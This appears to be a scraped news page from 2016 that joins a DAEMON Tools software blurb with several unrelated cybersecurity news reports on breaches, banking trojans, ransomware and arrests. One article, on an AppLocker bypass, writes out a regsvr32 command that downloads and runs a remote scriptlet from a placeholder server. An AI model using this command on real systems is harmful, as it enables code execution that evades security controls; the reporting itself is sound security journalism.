Released: March 1, 2016

DAEMON Tools Lite 10 is a well-known software used to create and mount images.

DAEMON Tools Lite 10 allows you to mount all known types of disc image files and emulates up to 4 DT + SCSI + HDD devices. It enables you to create images of your optical discs and access them via well-organized catalog.



With the latest major version, the program includes not only the free basic features for virtual devices emulation, but also a number of advanced tools to work with VHD, RAM disks, iSCSI Targets, bootable USB sticks and lots of others.

The free part of DAEMON Tools Lite 10 provides the following features:

• Ability to mount all popular types of images including VHD, VMDK and TrueCrypt files
  
  
  
  
• Creation of *.iso, *.mdx and *.mds/*.mdf image files
  
  
  
  
• Compression and protection of your custom virtual discs
  
  
  
  
• Emulation of up to 4 DT, SCSI or HDD devices
  
  
  
  
• Brand-new Images catalog filled automatically
  
  
  
  
  

• Add and adjust virtual drives
  
  
  
  
• Get short help guide on the first start
  
  
  
  
• Save folder structure for volatile RAM disks
  
  
• For Windows 7 and later only!
  
  
  
  

• Minor bugs
  
  
  
  

Yesterday, security researchers from FireEye and iSight Partner revealed a report detailing the previously unknown mode of operation of a criminal group named FIN6.

FireEye says the group surfaced in 2015 and focused only on the theft of financial information, mainly credit card data from organizations in the retail and hospitality sectors.

Researchers explain the group only targeted PoS (Point of Sale) systems and used two well-known malware families that aided their criminal efforts.

All FIN6 attacks started with email spam campaigns that distributed the Grabnew malware, also known as Vawtrack and Neverquest.

Grabnew is a credential-stealing backdoor with form-grabbing capabilities and the ability to inject code into specific Web pages. Grabnew collected login credentials for infected computers and PoS systems and then transmitted this information to the FIN6 group.
"FIN6 used Grabnew and Trinity malware"

The crooks then used this information, together with Grabnew's ability to download and install other malware, to deliver their second threat called Trinity, a malware family for PoS terminals.

Trinity collected vast amounts of data from infected systems, and at regular intervals, it would compress all data as a ZIP file, send it to an intermediary host, from where it was relayed to FIN6's C&C (command and control) servers.

The group would then take all this information and upload it to "card shops" hosted on the Dark Web, where other criminal groups would buy the information and carry out financial fraud operations.

Security researchers added that, in one singular card breach, FIN6 managed to steal data on over 20 million credit cards, which, when sold through its card shops, pocketed the group over $400 million (€355 million).

A visual presentation of FIN6's activities can be viewed in the YouTube video below, and for more details, Softpedia readers can download FireEye and iSight Partner's Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6 report.
source

Huang Yu, 48, was sentenced to death after Chinese officials discovered he was selling classified documents to an unidentified foreign intelligence agency, Shanghai Daily reports citing a China Central Television (CCTV) news broadcast.

Between 2002 and 2004, Huang worked as a computer technician for a governmental research institute in China’s Sichuan Province. In 2004, Huang was fired from this institute for poor performance.

Following his abrupt dismissal, Huang decided to contact a foreign intelligence agency via the Internet and offered to sell classified documents that he obtained from his former workplace and had copies of at home.
"Huang recruited his wife and brother-in-law"

Huang then met with foreign agents over 21 times and transmitted over 150,000 classified documents that contained information about a cipher system developed at the research institute he worked for, but also about China's Communist Party leadership and the country's military and financial operations.

Huang collaborated with the agency until 2011, and he received $10,000 (€8,850) as an initial fee and then a monthly salary of $5,000 (€4,400). During his partnership and up until being arrested, Huang made over $700,000 (€620,000).

At one point, after seeing his collection of stolen file deplete, Huang also enlisted his wife and brother-in-law to help exfiltrate new files. Huang's had a job at a similar research institute while his brother-in-law was an employee at the same institute where Huang also worked in the past.
"It's unclear if Huang has been executed or not"

Authorities got suspicious of Huang following numerous trips outside China's borders to meet with the agents and after he amassed a huge wealth without being employed.

Huang was arrested in 2011, and no details about his trial have ever been released. CCTV said he was sentenced to death, but did not mention if the sentence was carried out.

Furthermore, Huang's wife also received a five-year prison sentence while his brother-in-law got three years in prison. Twenty-nine of Huang's former colleagues also received punishments, which CCTV had not elaborated on.
source

A judge sentenced two hackers involved in the creation, maintenance, and marketing of the SpyEye financial botnet to a combined sentence of 24 years in prison, the US Department of Justice has announced today.

Aleksandr Andreevich Panin, 27, from Russia, known online as Gribodemon and Harderman, received nine and a half years in prison, while his accomplice, Hamza Bendelladj, 27, from Algeria, known online as Bx1, got 15 years in jail.
"SpyEye's birth and beginnings"

SpyEye was a banking trojan developed in 2010 and advertised as a "Zeus Killer." You should know that Zeus was a similar banking trojan that existed prior to SpyEye's birth and that was the most famous and wide-reaching banking botnet when the latter appeared.

Panin was the main developer behind the SpyEye trojan, but according to the FBI, Bendelladj also helped once in a while develop new SpyEye components but more often aided Panin in advertising the botnet on underground hacking forums such as Darkode.

The FBI credits Bendelladj with creating SpyEye's Automated Transfer System (ATS), the backend panel that helps criminals transfer money from the victim's account, and "Web injects," the trojan's component that taps into browsers and steals the victim's banking portal login credentials. Bendelladj is also credited with creating the SpyEye component that removed the competing Zeus trojan from infected computers.

With the two collaborating, SpyEye grew in popularity, mainly due to an aggressive advertising campaign and thanks to a lower price than Zeus’.
"SpyEye merges with Zeus, and Bendelladj leaks their source code"

In November 2010, Panin and Evgeniy Bogachev, Zeus' creator, came to an agreement to merge the two botnets. Bogachev, known online as Slavik, decided to retire and handed over Zeus' source code to Panin.

Unknown to Panin, Bendelladj had other plans and eventually leaked Zeus' source code online, and later SpyEye's code. Authorities say that Bendelladj didn't always get along with Panin, which may explain why he took such actions.

Besides playing a key role in SpyEye's creation and distribution, Bendelladj received a bigger sentence because of his role in other cyber-criminal operations.

Bendelladj used data acquired via the SpyEye botnet to create the VCC.sc website, where he sold stolen credit card information to other cybercriminals.
"Authorities made three arrests related to SpyEye operations"

The first one to get caught was Bendelladj, who was arrested in Bangkok, Thailand, in January 2013 while traveling from Malaysia to Egypt. It was later discovered that Bendelladj collaborated with authorities, and his insider information helped the FBI shut down the Darkode hacking forum last summer.

US authorities arrested Panin a few months later, in July 2013, at Atlanta's airport, while the criminal was changing flights.
Play Video

In May of 2014, James Bayliss, a British hacker, was also arrested and accused of collaborating with Panin on creating the ccgrabber SpyEye plugin, which was capable of searching and collecting credit card and CVV numbers from a victim's Internet (for submission) requests.

Bayliss' trial is still underway while Evgeniy Bogachev, Zeus' creator, was never caught and remains one of the FBI's most wanted cyber-criminals, with a $3 million (€2.65 million) reward for his capture.
"SpyEye botnet takedown and Bendelladj's impact on cyber-crime"

Since their arrest, authorities and cyber-security vendors such as Trend Micro, Microsoft, Dell, Flashpoint, PhishLabs, and Damballa have taken down most of the SpyEye botnets.

Authorities claim that SpyEye infected over 50 million computers and helped crooks steal over $1 billion (€885 million). At one point during the investigation, rumors surfaced that Bendelladj donated over $100 million (€88.5 million) from the SpyEye stolen money to Palestinian charities.

Bendelladj's impact in the cyber-crime world is much more than that, possibly in the realm of tens of billions of dollars. By releasing the source code of Zeus and SpyEye, Bendelladj provided other cyber-crime groups with a starter kit in creating their own banking trojans.

Nowadays, almost every month, there is a new banking trojan popping up that uses the old Zeus malware model or small bits of code. Just yesterday, Proofpoint researchers discovered the Panda Banker trojan, the most recent version based on the old Zeus code. Previosuly, they found another similar banking trojan named Thanatos.

You could say that Bendelladj has singlehandedly made banking trojans a commodity on the criminal underground while previously these types of operations were only reserved for criminal groups possessing large amounts of cash to buy, rent, and operate such infrastructures.

Before getting arrested and following the release of SpyEye's source code online by his former partner Bendelladj, Panin was planning to release SpyEye 2.0.

source

Dutch law enforcement, in cooperation with government agencies from other countries, has forced Ennetcom, a Dutch company providing encryption communications for mobile devices, to shut down its operations, three days ago, on April 19.
Ennetcom bitterly announced its clients about the government's decision by means of a popup showed on its website. The popup's text reads:
“  Tuesday, April 19th, 2016 revealed that judicial research is being done towards Ennetcom. There has been an international collaboration of various government agencies and Interpol in attempt to put our network down. Previously there have been attempts to put us down, amongst them the Dutch intelligence service, but they never succeeded (see Wikileaks). Regarding the current investigation, Ennetcom is forced to suspend all operations and services for the time being. Ennetcom regrets this course of events and insinuations towards Ennetcom. It should be clear that Ennetcom stands for freedom of privacy! Because of security and privacy reasons Ennetcom chooses to keep all systems offline.  ”
Following this announcement, the company's network was closed down, and clients weren't able to carry out any type of data transfers. Ennetcom had around 19,000 registered users.
Ennetcom accused of helping drug dealers
Ennetcom (Encrypted Network Communications) is a mobile network that relays all its traffic via BlackBerry Enterprise Servers (BES) using its PGP encryption system that the company calls Mobile Encryption Gateway. Additionally, customers also have to purchase specialized handsets to access the Ennetcom network.
The company claims that "it is impossible to intercept and decrypt any data that is sent from one handset to another." According to Dutch media, this is the reason the company's operations were suspended.
Dutch and international law enforcement agencies are saying that drug dealers are among Ennetcom's most devoted clients and have moved on to seize the company's servers.
Canadian police are rumored to be involved in the operation. Last week, evidence surfaced that Canada's Royal Canadian Mounted Police (RCMP) was in possession of a BlackBerry decryption master key that could unlock encrypted messages sent to BlackBerry devices. Most of Ennetcom's handset offering includes BlackBerry smartphones.


source

The details of 93,424,710 Mexican voters were exposed online via an unprotected MongoDB database that had no admin password and was easily reachable via a public IP address.

MacKeeper security researcher Chris Vickery discovered the database on April 14, running on an Amazon AWS cloud server. Soon after he identified the data and realized what he was looking at, the researcher contacted the US State Department and later the State Department’s Office of Mexican Affairs.
"Database was secured eight days after being discovered"

After receiving no response, the researcher then contacted the US Secret Service, Department of Homeland Security, US-CERT, Amazon, and the Mexican embassy in the US.

Eight days later, Mexico's Instituto Federal Electoral (Federal Electoral Institute) (IFE) reached out to Mr. Vickery, thanked him for his efforts, and also informed him they secured the database.

IFE representatives told DataBreaches.net that the IP on which the server was running was not one of their own, that the database's total statistics did not match their own numbers, and that they'd start an investigation to see how the data ended up on a US-based Amazon server.

Mexican law prohibits companies from moving sensitive data o Mexican citizens across the border. The maximum penalty is six years in prison.
"Database didn't contain financial or biometrics information"

According to Vickery and DataBreaches.net, the database contained Mexican citizens' names, full addresses, dates of birth, mother's and father's name, current occupation, and their voter ID.

Vickery is the security researcher who also discovered the details of 191,337,174 US voters through another misconfigured MongoDB database.

Before this incident, the details of 55 million Filipinos were leaked after Anonymous and LulzSec Philippines hackers breached the COMELEC database at the start of the month. Prior to that incident, the details for 50 million Turks were also leaked online.
source

US authorities have arrested new suspects in a lingering case that is linked to data breaches at some of the US' biggest financial firms, but also a money laundering scheme that involved a Bitcoin exchange website secretly and illegally operating through a New Jersey credit union.

Legal proceedings started in July 2015, when authorities arrested four suspects in relation to data breaches at twelve international companies, including nine financial institutions, between 2007 and 2014.

Authorities filed official charges against three Israeli citizens in November 2015, accusing them of stealing data from over 100 million users. JPMorgan Chase, Scottrade, The Wall Street Journal, E*Trade Financial Corp, TD Ameritrade, News Corp, and seven other more companies suffered data breaches.

Prosecutors charged a fourth man, Anthony Murgio, 31, of Florida, but at that time, authorities provided no details except an accusation of running illegal Bitcoin exchanges.
"Murgio and Lebedev operated the Coin.mx Bitcoin trading website"

More details were provided in subsequent charges in March 2016. Murgio and his partner, Yuri Lebedev, were accused of running the Bitcoin exchange portal Coin.mx by disguising Bitcoin-dollar transactions via the Helping Other People Excel (HOPE) Federal Credit Union in Jackson, New Jersey.

The credit union's former president, Trevon Gross, 46, was also charged with taking a bribe to facilitate Murgio's election on the credit union's board of directors.

According to a recent report from the SunSentinel, Michael Murgio, 65, of Florida, Anthony Murgio's father, was also arrested and charged with federal bribery charges, being involved in the incident mentioned above.

Additionally, the prosecution also piled a money laundering charge on top of the previous indictments for Murgio and Lebedev, Coin.mx's operators.

Prosecutors are accusing the two of knowing that their service was used to convert dollars to Bitcoin, which would then be used by victims of ransomware infections to pay ransoms.

US laws say that Murgio and Lebedev should have informed authorities that such actions were happening through their service, instead of remaining silent and indirectly complicit in the crime.

Of course, the technical details of Bitcoin transactions wouldn't have helped US authorities track down ransomware operators anyway, but this was just another opportunity to throw an extra charge on an already bulky criminal case.
source

In a meeting held in New York, representatives of law enforcement and governments from the US and the UK met to agree on a joint plan to tackle cyber threats, and their top priority for the foreseeable future will be phishing attacks.

The Global Cyber Alliance (GCA) was founded at the start of January this year, and on March 19 held its first Strategic Advisory Committee (SAC) meeting.

Here, founding members that included representatives from the City of London Police, The New York County District Attorney's Office and the Center for Internet Security agreed on a list of today's top cyber risks, in order to develop joint strategies to counter their effects.
"Phishing ranked top cyber threat, DDoS attacks ranked fourth"

Based on their expertise, these three organizations ranked phishing attacks as today's greatest cyber threat, followed in order by risks arising from weak identity and authentication mechanisms, risks arising from vulnerable and compromised websites, and Distributed Denial of Service (DDoS) attacks.

Personally, we see vulnerable and compromised websites as a more dangerous threat, but we must also agree to disagree.

Just recently we've seen many compromised websites (frontends, backends, exposed network equipment) allowing attackers to gain a foothold on infected systems, from where attacks can then escalate. Phineas Fisher, the famous hacker that breached Hacking Team's servers last year didn't use phishing for his attacks.

Nevertheless, our view on this topic may be skewed by our technical prowess in terms of cyber-security practices. Phishing, you see, while ineffective against a security expert, is quite effective against most regular people.

While companies may benefit from a security team to address their website security, you at home may not benefit from anti-phishing training, and here is where authorities need to stand in and help.
"GCA: DMARC usage needs to increase"

In order to stop, or at least cut down the number of phishing attacks, the GCA plans to promote the usage of the DMARC protocol that makes it harder to spoof original domains. Further plans include the GCA promoting the usage of secure DNS practices, which will also impede basic spear-phishing attacks.

Law enforcement and government agencies are right to be worried about spear-phishing, as Rohyt Belani, co-founder, and CEO of PhishMe told Softpedia.

"Recent research shows that employee-targeted spear-phishing campaigns spiked a staggering 55 percent just last year in addition to the FBI’s recent warnings that phishing-related wire fraud scams have cheated businesses out of $2.3 billion since 2013.

"Those of us in the security industry realize these upward trends signify that attackers will continue targeting employees as a primary exploitation point as long as they’re experiencing continued success.

"Seeing law enforcement agencies and municipal governments working closely together to address and combat serious threats is encouraging. The recent announcement from the Alliance brings additional visibility to the dangers of phishing and reinforces that this attack vector is a top cybercrime concern.
"Outside technical measures, employees need better anti-phishing training as well"

Mr. Belani also warns companies not to rely solely on the technical side and spend time training their employees against common phishing practices.

"Although various technology layers are essential for a strong defense-in-depth strategy, security professionals must remember that empowering employees as a last line of defense is key in defeating spear-phishing threats," Mr. Belani also told Softpedia.

"As research proves, employees remain a primary target for infiltrating organizations since malicious emails are consistently passing through weak perimeter defenses and landing in staff inboxes. By effectively conditioning behavior and operationalizing human intelligence, organizations will be better equipped to identify, prioritize and respond to phishing and other key threats before attack payloads are delivered.

"Failure to embrace employees and human-generated intelligence as viable defensive layers in an organization’s security posture is akin to not having a line of defenders standing between the soccer goal and the opposition when the latter is taking a free kick."
source

Clever hackers can bypass Microsoft's Windows AppLocker security feature by abusing a hidden trait of the Regsvr32 command-line utility that's normally used to register DLLs on a Windows computer.
AppLocker is a security feature introduced with Windows 7 and Windows Server 2008 R2 that helps administrators specify which users or group of users are allowed to access and run files on a per-file basis.
Regsvr32 is a scripting utility that can be used by installers or in batch scripts to quickly register a DLL. As you'd imagine, Microsoft has neutered such a dangerous tool in order to prevent abuses by allowing administrator privileges to run.
Attacks are impossible to detect
According to security researcher Casey Smith, an attacker that has a foothold on an infected Windows workstation can abuse Regsvr32 to download a COM scriptlet (.sct file) off the Internet and run it to register a DLL on the local machine.
The attacker won't need admin privileges, Regsvr32 is proxy aware, can work with TLS content, follows redirects, and above all, signed by a Microsoft-issued certificate, making all commands look like normal Windows background activity.
Below are the standard Regsvr32 syntax and a version of a malicious command:
regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
Regsvr32 feature is not documented
"It's not well documented that regsvr32.exe can accept a url for a script," Smith also noted. "In order to trigger this bypass, place the code block, either VB or JS inside the element."
For further tests, the researcher has also published four proof-of-concept scripts on GitHub that sysadmins can load via Regsvr32 and open a backdoor or a reverse shell over HTTP.
In theory, these kinds of exploits would allow a hacker access to registers DLLS and then execute malicious code on the compromised machines, even with admin privileges.

source

While trying to find bugs in Facebook's services, a security researcher accidentally stumbled over a hacker's backdoor script that was logging Facebook employee credentials for some of the company's backend applications.

Orange Tsai, a consultant for DevCore, also spends a lot of his free time helping big name companies fix vulnerabilities via their bug bounty programs. At the end of February, Tsai decided to give Facebook's bug bounty program another try and started mapping some of the company's backend services for possible servers he might hack.
"Researcher hacks Facebook's internal file sharing application"

His search led him to the files.fb.com domain, which is an online file transfer and file hosting service, running on Accellion’s Secure File Transfer (FTA) application.

After identifying the application's type and version, the researcher went to work and explored its source code, discovering in three cross-site scripting (XSS) flaws, two local privilege escalation issues, a known-secret-key issue that led to remote code execution, and a pre-auth SQL injection that also led to remote code execution.

The researcher used the SQL injection flaw he discovered in the FTA application to access Facebook's server and was rewarded with complete control over the machine.

With his goal reached, the researcher then started collecting the necessary information to submit a bug report to Facebook's staff. While looking at one of the server's logs, Tsai discovered a lot of suspicious error messages.
"Somebody already hacked the server and not part of the bug bounty program"

He tracked these messages down to a webshell, which he was sure, and quite obvious, that no Facebook employee ever uploaded. Inspecting the webshell's source code, Tsai found evidence of a server-side keylogger which was intercepting login operations and storing Facebook employee access credentials in a local log file.

The researcher then looked at other log files that showed how the hacker came back at various intervals to collect the logged data, map the local network, and attempt to steal SSL private keys.

Details revealed two separate periods when the hacker was active, one in July 2015, and then one in mid-September 2015.

Tsai filed a bug report with Facebook about the incident, who started an in-house forensics investigation, and rewarded the researcher with $10,000 (€8,850) for his efforts.

UPDATE: In a statement on Hacker News, Facebook's Reginaldo Silva said the webshell discovered on its servers was left there by another bug hunter, also enrolled in the company's bug bounty program.

source

Yesterday, Akamai SIRT (Security Intelligence Response Team) issued a new threat advisory warning companies that one of Anonymous' most famous hacktivism campaigns has now changed its MO, with DDoS attacks carried out all over the globe, not just in Japan.

OpKillingBay started as early as 2013 and was a collective effort from Anonymous hackers who set out to attack and shut down websites belonging to the Japanese government because of their intense and gruesome whale and dolphin hunting operations.

The Anonymous operation continued non-stop all these years, but the hackers rarely targeted sites outside Japan's government and local municipalities.

Two rare exceptions occurred in November 2015, when the group shut down five government websites in Iceland for participating in whale hunting operations, and then in January, when the hackers attacked Nissan just because it was a big Japanese corporation and didn't use its influence to discourage whale hunting in the country.
"The Iceland and Nissan attacks were eye-openers"

Akamai researchers say that these exceptions are now the norm in DDoS attacks marked with the OpKillingBay tag. Hacktivists are now attacking not only the Japanese government for continuing to run somewhat illegal whale hunting operations but also the governments and companies from other countries such as Iceland, Denmark, and the Faroe Islands.

Furthermore, attacks have also been recorded against companies that have nothing to do with official whale hunting policies but are still targeted because they don't do anything about it.

Akamai says that, after the Nissan DDoS attack in January, the company saw similar attacks against a different automaker on February 4.

Besides the automotive industry, attacks were also carried out against companies activating in the retail business, telecommunications, transportation, sports, travel, theme parks, seafood, and financial sectors.

Seeing that Japanese officials have largely ignored the past DDoS incidents, the hacktivists seem poised to make as much noise as possible for their campaign by targeting everything that has remotely anything to do with whale and dolphin hunting.
source

Philippine authorities announced they arrested Paul Biteng, a 23-year-old college student, for his role in the hacking of the Philippines Commission on Elections (COMELEC) website.

The COMELEC hack took place on March 27, when members of the Anonymous Philippines group defaced the website leaving a message behind, warning that some corrupt government officials may try to abuse PSOC (Precinct Count Optical Scan) devices to manipulate votes in the upcoming Presidential election.

A few days later, members of the LulzSec Philippines hacking crew breached the same website, but instead of leaving another message on its frontpage, these hackers opted to steal all the Filipino voter records and dump them online.
"It took three weeks for authorities to track down the hacker"

Following a three-week investigation, the Philippine National Bureau of Investigation (NBI) announced it tracked down and arrested Biteng on Wednesday night, April 20, in Manila.

Officials say he's a member of the Anonymous group and that they're still looking for two other suspects that aided Biteng deface the website. Investigators didn't provide information to reveal if these two collaborators are members of Anonymous or LulzSec.

According to the NBI, besides the COMELEC website, Biteng has defaced 25 other government sites. Among hacked websites, officials enumerated the sites of the Civil Service Commission, the Dipolog city government, and PAGASA (Philippine Atmospheric, Geophysical and Astronomical Services Administration).

Investigators say that his prolific activity has helped them track him down, the hacker leaving many clues that tied him to the COMELEC hack and revealed his true identity.
"COMELEC data was briefly available online as a search-through website"

Two days ago, data from the COMELEC hack surfaced online on the wehaveyourdata.com website which allowed users to search the private details of any Filipino voter. Authorities have taken down the website in the meantime.

Below are videos from the press conference held by Philippine officials and electoral authorities.
source

During the first three months of the year, DDoS protection firm Imperva observed a series of interesting trends regarding the DDoS landscape. According to the company's latest quarterly report, both network layer and application layer attacks grew in size and sophistication.

One of the rising trends is for Mpps network layer DDoS floods. Mpps stands for "Millions of packets per second" and refers to attacks targeting networking equipment by sending massive amounts of packets, not necessarily enough to clog up the company's bandwidth, but sufficient to overwhelm and crash networking equipment such as switches and routers.
"Network layer multi-packet attacks may be the next hot trend"

Imperva experts say they mitigated on average a 50+ Mpps DDoS attack every four days and 80+ Mpps attacks every eight days.

"We estimate that high Mpps attacks are being used as an attempt to circumvent current-gen DDoS mitigation solutions," Igal Zeifman, senior inbound marketing manager for Incapsula explained.

"By now, the majority of mitigation services and appliances are highly effective in dealing with high Gbps assaults. However, [...] many of the same solutions are not be as capable of dealing with high Mpps scenarios, as they weren’t designed with high packet processing rates in mind."

Another trend observed in network-level DDoS attacks includes the growth of multi-vector attacks. Imperva says that 33.9 percent of all the DDoS attacks it detected in Q1 2016 were multi-vector. A previous report by Neustar for Q4 2015 had this number at 17 percent.
"Application layer attacks are getting smarter"

On the other hand, for application-level attacks, Imperva says that it saw a rise both in the size of these attacks and their sophistication.

At the start of the month, the same Imperva was reporting on a new record for Layer 7 DDoS attacks set by the Nitol botnet.

Looking back over the entire quarter, besides this size increase, Imperva also noticed another trend. Botnet operators are beginning to deploy smarter bots (malware that infects computers to launch DDoS attacks).

In the first three months of the year, Imperva saw bots that could accept and hold cookies and bots that can parse JavaScript code in 36.6 percent of all the DDoS traffic. This same number was only 6.1 percent in Q4 2015.

The reason is that DDoS mitigation services use either cookies or JavaScript code to distinguish between actual users (browsers) and automated traffic, so adding these capabilities to DDoS bots allow them to circumvent some protection systems. Imperva says that, in most of the detected cases, DDoS bots were masked as Chrome and Firefox using fake user agent strings.

For more details, Softpedia readers can check out Imperva's Global DDoS Threat Landscape Q1 2016.

source

An RAT (Remote Access Trojan) created at the start of the 2000s and then abandoned in 2008 has received a surprising update and is now being used to target pro-democracy organizations and supporters in Hong Kong.

Computer malware is never effective more than one-two years, mainly due to the rapid evolution of the underlying operating systems. In terms of malware age, Poison Ivy (PIVY) is a very very, very old tool.

Nevertheless, in its heyday, Poison Ivy was one of the criminal underground's top tools, mainly used due to its low antivirus detection rate and its simplistic GUI that allowed even non-technical users to utilize it without too many headaches.
"Eight years later, Poison Ivy receives an update"

On record, the last update Poison Ivy has received is 2.3.2 in 2008. According to surprised researchers from Palo Alto's Unit42 security forensics team, this RAT has recently received an update and has only been deployed in cyber-espionage campaigns against pro-democracy groups in Hong Kong, who have organized and participated in public protests for the past year.

According to the security firm, organizations, and individuals involved in these pro-democracy movements have started to receive spear-phishing emails that contained malicious Word files.

To lure victims into downloading and opening these files, they all have appealing titles for someone involved in freedom campaigns. The emails say the file attachments contain information about recent events, March-April 2016, and range from mandatory courses for school children to details about the Mong Kok riot, and a wreath laying event for the Tiananmen Square massacre.
"New Poison Ivy version uses DLL hijacking, code obfuscation"

If users open these documents, by leveraging a vulnerability in the Microsoft Office package (CVE-2015-2545), attackers are infecting targets with the latest version of the Poison Ivy RAT, nicknamed by Palo Alto as SPIVY.

SPIVY would then go to use DLL hijacking techniques to load its malicious code in running OS processes and start a connection with its C&C servers, from where attackers are sending orders and stealing data.

This tactic is not new, and Hong Kong pro-democracy organizations have been targeted in the past before, along with other targets in Taiwan. In most attacks, the targets have different political views from China's main policies, so someone could quickly jump to conclusions, even if researchers have declined to launch official accusations.
source

Security firm SentinelOne discovered a new technique leveraged by malware coders that are hiding the most dangerous parts of RATs (Remote Access Trojans) inside the OS memory and are using PNG files as configuration files.

Researchers first observed the technique in a series of state-sponsored attacks against Asian countries. The malware along which it was used with is NanoCore (also known as Nancrat), an RAT first detected in the spring of 2014.

For this campaign, this threat was distributed as an EXE file that, when launched into execution, would extract a second EXE. Only the first EXE was stored on disk, containing no malicious behavior while the second EXE was injected into the system memory with the help of an encrypted DLL and a series of PNG files.

According to the SentinelOne team, because this second EXE never touched the storage space, classic antivirus solutions never picked up its malicious behavior. Only security products that scan the OS memory would be able to pick it up the second EXE.

If you're curious, the role of the PNG files would be to store configuration data for the RAT's normal mode of operation. All images are just a mess of random pixels, but when the second EXE reads their content, they assemble back into parts of the RAT payload and its configuration settings.

source

Malware analysts from Proofpoint and Fox IT InTELL have come across a new banking trojan, related to the old Zeus trojan, targeting banks in Australia and the UK.

Detected for the first time on March 10, this new banking trojan, named Panda Banker, spreads as all other banking trojans, via weaponized Word files.

These Word files either use vulnerabilities in Microsoft Office (CVE-2014-1761 and CVE-2012-0158) or rely on social engineering tricks, trying to convince users to enable Macro support in the Word files.

Once this happens and Panda Banker gets a foothold on the victim's PC, it gathers information about the local target and sends it to its C&C (command and control) server, which creates a fingerprint for the infected host so that it would be able to distinguish it from other bots.
"Panda Banker only targets banks activating in UK, Australia"

The information Panda Banker sends to its C&C server from each target includes current username, installed antivirus and firewall solutions, OS version information, computer name, local time, and many more.

The server then responds with a configuration file in JSON format, with a list of alternative C&C domains, and a list of websites where the banking trojan should insert malicious code.

These latter websites are nothing more than banking portals. Proofpoint has seen this the trojan targeting the clients of banks like Santander Bank, Lloyds Bank, Bank of Scotland, TSB, and Halifax UK.
"Panda Banker also distributed via exploit kits"

Its normal mode of operation resembles Zeus', which hijacks browser processes and inject malicious code into the Web page of the aforementioned banking portals, stealing the user's login credentials.

Besides infecting users via Word files, Proofpoint has also seen the crooks employ three different exploit kits (Angler, Nuclear, and Neutrino) to deliver their trojan to unsuspecting victims. The strangest detail about this campaign is that the crooks used geo-location filters so only Australian and British users would be infected.

"Like many modern banking Trojans, Panda Banker appears to have roots in Zeus with sophisticated means of establishing persistence and uses in both targeted and widespread attacks," ProofPoint noted. "Banking Trojans like Zeus, Dyre, Tinba, and Dridex have netted cybercriminals billions of dollars by stealing banking credentials and, in many cases, generating fraudulent transactions."
source

Farmers who employ Internet-connected and precision farming equipment should be very mindful of the way they configure their devices, the FBI warned in a public statement advisory at the end of March.

The Bureau, together with the US Department of Agriculture (USDA), issued the note on March 31, as an alert to the growing threat of IoT security.

The FBI is particularly warning against data breaches that may expose farming data saved with various companies or on cloud accounts.

“  While precision agriculture technology (a.k.a. smart farming) reduces farming costs and increases crop yields, farmers need to be aware of and understand the associated cyber risks to their data and ensure that companies entrusted to manage their data, including digital management tool and application developers and cloud service providers, develop adequate cybersecurity and breach response plans.  ”
"Hacktivism may also play a part"

Additionally, the FBI is also sounding the alarm against hacktivists who might target farmers as a way of protesting against the US' agricultural policies.

An incident like this happened last fall, when Anonymous hacker leaked data of USDA employees to protest against Monsanto, a multinational corporation activating in the agricultural sector.

Because farmers have taken advantage of the recent technological breakthroughs and have populated their farms with so-called "smart" equipment, they have also exposed themselves as targets to hackers who may leverage the Internet connections that this machinery may now need.

An improperly configured smart tractor can leak data about the farm's production and activity, data that may end up in a competitor's hands.
"FBI is trying to avoid the "healthcare disaster""

FBI and USDA officials claim they want to prevent a disastrous situation from repeating in the agricultural sector, similar to the one that occurred in the healthcare industry, which was caught unprepared for the arrival of the Internet of Things.

For this, the FBI has put forward a series of recommendations on which US farmers can build their cyber-security policies.

»   Monitor employee logins that occur outside of normal business hours.

»   Use two-factor authentication for employee logins, especially remote logins.

»   Create a centralized Information Technology email account for employees to report suspicious emails.

»   Provide regular training to remind and inform employees about current social engineering threats.

»   Monitor unusual traffic, especially over non-standard ports.

»   Monitor outgoing data, and be willing to block unknown IP addresses.

»   Close unused ports.

»   Utilize a Virtual Private Network (VPN) for remote login capability.
source

PandaLabs, Panda Security’s anti-malware lab, detected a new type of ransomware that they think could be reverse engineered to allow users to recover their files.

Named CryptoBit, this particular ransomware variant infects users via exploits. First infections appeared at the start of April, and security researchers claim the ransomware is somewhat strange in its mode of operation.

After infection, CryptoBit will first and foremost scan for files that have particular extensions. By default, it will look for 96 different file types, searching for regular data storage files, such as images, file archives, databases, and office documents.
"CryptoBit uses AES+RSA encryption"

Once CryptoBit identifies all valuable files, it will proceed to encrypt them using the AES algorithm that employs one key for encryption and decryption.

The AES encryption key itself is then encrypted with an RSA algorithm, which is a dual-key encryption model that uses a different key for encryption (public key) and decryption (private key). Researchers say the private key is most likely sent to a server under the ransomware author's control.

After the encryption process ends, CryptoBit will display a ransom note as the one below, telling the user their files were encrypted and that they must contact the ransomware's author via an email address or the Bitmessage network, using a special ID.

Compared to other ransomware families, CryptoBit is very greedy, asking for a whopping 2 Bitcoin (~$850). Most ransomware families these days only ask for 0.5 (~$215), maximum 1 Bitcoin (~$425).
"CryptoBit may have a flaw"

According to PandaLabs researchers, there might be a flaw in CryptoBit's armor.

"We notice[d] a specific detail: the absence of calls to the native libraries that encrypt files using the RSA algorithm," PandaLabs researchers say. "CryptoBit uses a series of statically compiled routines that allow you to operate with large numbers ('big numbers'), making it possible to reproduce the RSA encryption algorithm."

As it looks right now, it may be possible for security researchers to reverse-engineer the ransomware's custom RSA encryption operations and recover the original AES encryption file.

Users should not confuse CryptoBit with another ransomware family called CryptorBit, which was very active during 2014.
source

In its latest quarterly Mobile Data Report, Wandera has revealed a significant rise in apps leaking credit card data on enterprise mobile devices.

The company, which specializes in mobile data security and management, compiled the report by analyzing the data usage trends and traffic patterns across its global network of enterprise mobile devices. Between Q4 2015 and Q1 2016, there has been a 17 percent increase in apps and mobile websites leaking credit card data.

The CardCrypt security flaw that was discovered in December of 2015 has played a large roll in the amount of credit card data that has been leaked. The security flaw affected 16 global companies’ mobile websites and apps which turned out to be transmitting users’ credit card details and even the passport information of some users.

Wandera also noted that the amount of malicious domains visited by users had gone up substantially in Q1 2016. There was a 200 percent increase per month during the quarter which the company has attributed to the ad frameworks being used within apps and websites. The ads displayed often lead users to malicious domains against their will and Wandera is advising all mobile users to think twice before tapping on any ad displayed within an app or their browsers.

The company’s report did notice a positive trend towards greater encryption within browsers and apps. Wandera’s research shows that 70 percent of the data from apps is now encrypted, which is a 21 percent increase that has occurred over the last 12 months. However, the encryption of data within browsers only increased by 13 percent to a total level of 52 percent encryption.

